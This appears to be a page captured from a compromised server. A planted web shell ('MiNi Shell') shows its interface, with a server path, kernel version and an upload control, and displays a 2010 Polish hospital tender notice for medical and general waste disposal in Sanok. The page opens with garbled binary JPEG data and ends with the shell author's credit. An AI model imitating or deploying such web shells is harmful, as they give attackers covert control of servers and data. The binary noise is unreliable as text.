JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100121/14289-N-2010.html

<p class="kh_header"><b>Sanok: Świadczenie usług w zakresie odbioru, transportu i zagospodarowania odpadów medycznych oraz gospodarczych SPZOZ w Sanoku</b><br>
<b>Numer ogłoszenia: 14289 - 2010; data zamieszczenia: 21.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. 800-lecia 26, 38-500 Sanok, woj. podkarpackie, tel. 013 4656290, faks 013 4656290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zozsanok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie odbioru, transportu i zagospodarowania odpadów medycznych oraz gospodarczych SPZOZ w Sanoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie sukcesywnych usług na rzecz SPZOZ w Sanoku           w zakresie odbioru, transportu (wraz z załadunkiem i ważeniem) i zagospodarowania odpadów medycznych i gospodarczych, w okresie 12 miesięcy, z podziałem na części, wg. części V siwz Opis części zamówienia
Wspólny słownik zamówień: 
CPV- 90. 53.30.00-2 usługi gospodarki odpadami
CPV- 90. 52.40.00-6 usługi w zakresie odpadów medycznych
CPV- 90. 51.20.00-9 usługi transportu odpadów 
Niniejsze Zamówienie dotyczy odpadów o kodach: 180103, 180102, 180182, 180106, 180107, 180109, 160601, 160103, 160115, 160122, 160113, 160107, 130208, 160604, 150110, 090101, 090104, 090107, 150102, 130701, 060404, 160213, 160211, 160215, 160214.
Szczegółowy zakres i opis przedmiotu zamówienia zawarty jest w załączniku nr 1 do SIWZ oraz       w opisie części zamówienia.
Głównym miejscem magazynowania jest wolnostojący metalowy barak zlokalizowany na terenie SPZOZ w Sanoku, ul. 800-lecia 26 oraz inne miejsca przeznaczone na składowanie odpadów           na terenie SPZOZ przy ul. 800-lecia 26 oraz Konarskiego 8. Poszczególne odpady przechowywane są  w specjalnych workach z PVC na odpady do utylizacji, oznakowanych i szczelnie zamkniętych. 
Odbiór odpadów od Zamawiającego odbywać się będzie transportem Wykonawcy: 
dla zadania nr 1 - odbiór odpadów będzie wykonywany raz na 7 dni, w godzinach ustalonych              z Zamawiającym,
dla zadania nr 2 i 3 - odbiór odpadów będzie wykonywany na podstawie odrębnych pisemnych zgłoszeń (za pomocą faxu) przez Dział Zaopatrzenia i Gospodarczy z co najmniej 7 dniowym uprzedzeniem przed terminem tego odbioru. 
Wykonawca jest zobowiązany do załadunku i ważenia (samochód do odbioru odpadów musi być wyposażony w wagę) odbieranych odpadów we własnym zakresie.

2. Warunki realizacji zamówienia zostały zawarte we wzorze umowy stanowiącym integralną część SIWZ.

Dopuszcza się składanie ofert na poszczególne zadania, w przypadku niewypełnienia  jakiejkolwiek pozycji w danym zadaniu (ofercie) - taką niepełną ofertę na dane zadanie zamawiający odrzuci.

Zadanie nr 1 -  sukcesywna usługa odbioru, transportu i zagospodarowania odpadów medycznych oznaczonych kodami: 180103 (Mg 80), 180102 (2,00 Mg), 180182 (0,30 Mg), 180106 (0,003 Mg), 180107 (0,01 Mg), 180109 (0,02 Mg)

Zadanie nr 2 - sukcesywna usługa odbioru, transportu i zagospodarowania odpadów RTG oznaczonych kodami:090101 (2,50 Mg), 090104 (2,50 Mg), 090107 (0,50 Mg)

Zadanie nr 3 - sukcesywna usługa odbioru, transportu i zagospodarowania odpadów gospodarczych oznaczonych kodami:160601 (0,22 Mg), 160103 (0,60 Mg), 160115 (0,10 Mg), 160122 (0,02 Mg),  160113 (0,008 Mg), 160107 (0,075 Mg), 130208 (0,35 Mg),  160604 (0,04 Mg),  150110        (0,30 Mg),  150102 (2,70 Mg),  130701 (1,00 Mg),  060404 (0,02 Mg),  160213 (1,80 Mg),  160211 (0,50 Mg),  160215 ( 0,80 Mg),160214 (1,00 Mg)

Szczegółowy opis, zakres i wielkość przedmiotu zamówienia został zawarty w formularzu  oferty stanowiącym załącznik nr 1 do Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.52.40.00-6, 90.51.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22  ust.1 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:      
1.  posiadania uprawnienia do wykonania określonej działalności lub czynności  jeżeli  przepisy prawa nakładają obowiązek ich posiadania,
2. posiadania niezbędnej wiedzy i doświadczenia, 
3. dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, 
4. sytuacji ekonomicznej i finansowej,
5. Zamawiający ustala następujące szczegółowe warunki udziału w Postępowaniu:

5.1. W zakresie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania - 
Wykonawca posiada zezwolenie właściwego organu na prowadzenie działalności w zakresie gospodarki odpadami (tj. zbieranie, transport lub odpowiednio odzysk lub unieszkodliwianie) uprawniające do przejęcia odpadów od posiadacza SPZOZ w Sanoku o rodzajach (kodach) wyszczególnionych w opisie przedmiotu zamówienia oraz w formularzu oferty - załącznik nr 1  do SIWZ, co zgodnie  ustawy z dnia 27 kwietnia 2001r. o odpadach.

6. Wykonawca ubiegający się o udzielenie zamówienia  nie może podlegać wykluczeniu z postępowania, zgodnie z art. 24 ust.1  i 2 ustawy Prawo zamówień publicznych
Sposób oceny: 
Nie spełnienie chociaż jednego z ww. warunków będzie skutkować odpowiednio wykluczeniem Wykonawcy z postępowania lub/ i  odrzuceniem oferty Wykonawcy. Ocena spełniania warunków udziału w postępowaniu o udzielenie zamówienia obejmuje stwierdzenie, czy dana oferta zawiera właściwe dokumenty bądź oświadczenia, stosownie do  Części XI SIWZ.
Warunki podane w pkt. 1),2),3),4),5.1), 6) zostaną ocenione w systemie spełnia - nie spełnia  na podstawie przedłożonych oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Druki, które należy wypełnić i podpisać (wyłącznie przez osoby uprawnione               do reprezentowania firmy), załączyć do oferty:
a)Formularz ofertowy - zał. nr 1
b)Formularz przedmiotu zamówienia, cenowy - zał. nr 2
c)Oświadczenie zgodne z wymogami art. 22 Ustawy - zał. nr 3
d)Oświadczenie o nie podleganiu wykluczeniu z post. na podstawie z art. 24 ust1 Ustawy - zał. nr 4
e)Parafowany wzór umowy- zał. Nr 5-(zalecane)
f)Informacja (wykaz) o podwykonawcach (wzór zawiera zał. nr.6 do siwz) [gdy dotyczy]


2. Oświadczenia oraz dokumenty, które należy złożyć w oryginałach, ewentualnie w odpisach lub kserokopiach poświadczonych za zgodność z oryginałem przez Wykonawcę (osoba/osoby uprawniona/e do reprezentowania firmy):
W przypadku podmiotów ubiegających się wspólnie o udzielenie zamówienia (np. konsorcjum, spółka   cywilna), każdy z wykonawców którzy wspólnie ubiegają się o udzielenie zamówienia  musi udokumentować spełnianie warunków o jakich mowa w części XI SIWZ. tj. posiadania uprawnienia do wykonania określonej działalności lub czynności  jeżeli  przepisy prawa nakładają obowiązek ich posiadania.  Przy ocenie spełniania warunków, o których mowa w art. 22 ust. 1 pkt. 2, 3 i 4 ustawy Pzp, będzie brany pod uwagę łączny potencjał  techniczny i kadrowy wykonawców, ich łączne kwalifikacje, doświadczenie oraz łączna sytuacja ekonomiczna i finansowa.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji wykonawca  zobowiązany jest przedstawić zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 
Dopuszcza się możliwość składania wspólnych oświadczeń wykonawców wspólnie ubiegających się o udzielenie zamówienia potwierdzających, że razem spełniają warunki udziału w postępowaniu i brak jest podstaw do wykluczenia z powodu niespełniania warunków o których mowa w art. 24 ust.1.
2.1) Oświadczenie o spełnianiu warunków określonych przepisami art. 22 ust.1 ustawy Prawo zamówień publicznych  oraz o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy pzp

2.2) wymagane dokumenty w celu wykazania  braku podstaw do wykluczenia z postępowania w okolicznościach o których mowa w  art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych : 
a) aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy; 
b) Oświadczenie  o braku podstaw do wykluczenia z postępowania z powodu niespełniania warunków, o których mowa  w art. 24 ust. 1 ustawy Pzp

Wykonawca na żądanie zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania wniosków do udziału w postępowaniu lub składania ofert, spełnianie warunków, o których mowa w  art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust.1

W sytuacji gdy Wykonawca będzie polegać na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b ustawy Pzp tj. na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach innych podmiotów -niezależnie od charakteru prawnego łączących go z nimi stosunków,  w takiej sytuacji wykonawca  zobowiązany jest udowodnić zamawiającemu, tj. przedstawić zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, a podmioty te będą  brały udział w realizacji części zamówienia, Wymagane jest  złożenie przez taki podmiot dokumentów o których mowa w pkt. 2.2 a), b) . 

W przypadku podmiotów wspólnie ubiegających się  o udzielenie zamówienia (konsorcjum, spółka cywilna):  
 - należy przedłożyć oryginał pełnomocnictwa (pełnomocnictw) udzielonego (y-ch) przez  wszystkich wspólników spółki cywilnej lub przez wszystkich członków konsorcjum do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia - jeżeli wspólną ofertę składają podmioty prowadzące działalność w formie spółki cywilnej lub powołano konsorcjum dla wykonania zamówienia  (zgodnie z art. 23 ust. 2 pzp). Umocowanie może także wynikać z treści umowy konsorcjum lub treści umowy spółki cywilnej 

2.3) Zamawiający żąda następujących dokumentów w celu wykazania spełniania przez Wykonawcę  warunków, o których mowa w art.22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, : 

a) koncesji, zezwolenia lub licencji-  właściwego organu na prowadzenie działalności w zakresie gospodarki odpadami (tj. zbieranie, transport lub odpowiednio odzysk lub unieszkodliwianie) uprawniające do przejęcia odpadów od posiadacza SPZOZ w Sanoku zgodnie z przepisami ustawy z dnia 27 kwietnia 2001r. O odpadach.

W przypadku gdy wykonawca polegania na zdolności finansowej innych podmiotów (na zasadach określonych  w art. 26 ust.2b ustawy Pzp), należy przedłożyć wymagane w tym punkcie SIWZ  dokumenty dotyczące tych podmiotów.
Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić wymaganego w tym punkcie   SIWZ dokumentu  dotyczących sytuacji finansowej i ekonomicznej, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego w  części XI SIWZ warunku.

2.9) WYKONAWCA zamieszkały poza terytorium Rzeczpospolitej Polskiej:
a) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2.2 a),b), składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z § 4 Rozporządzenia Prezesa Rady Ministrów  z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U.z 2009 r.,  Nr 226, poz. 1817)   tj. dokumenty potwierdzające, że:
nie otwarto jego likwidacji ani nie ogłoszono jego upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
Powyższe dokumenty winny być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozsanok.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Budynek Administracji SPZOZ w Sanoku ul. 800-lecia 26-  POK. NR 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 10:00, miejsce: Budynek Administracji SPZOZ w Sanoku ul. 800-lecia 26 - SEKRETRIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Odpady medyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywna usługa odbioru, transportu i zagospodarowania odpadów medycznych oznaczonych kodami: 180103 (Mg 80), 180102 (2,00 Mg), 180182 (0,30 Mg), 180106 (0,003 Mg), 180107 (0,01 Mg), 180109 (0,02 Mg).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> odpady RTG.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna usługa odbioru, transportu i zagospodarowania odpadów RTG oznaczonych kodami:090101 (2,50 Mg), 090104 (2,50 Mg), 090107 (0,50 Mg).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> odpady gospodarcze.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywna usługa odbioru, transportu i zagospodarowania odpadów gospodarczych oznaczonych kodami:160601 (0,22 Mg), 160103 (0,60 Mg), 160115 (0,10 Mg), 160122 (0,02 Mg),  160113 (0,008 Mg), 160107 (0,075 Mg), 130208 (0,35 Mg),  160604 (0,04 Mg),  150110        (0,30 Mg),  150102 (2,70 Mg),  130701 (1,00 Mg),  060404 (0,02 Mg),  160213 (1,80 Mg),  160211 (0,50 Mg),  160215 ( 0,80 Mg),160214 (1,00 Mg).</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.51.20.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com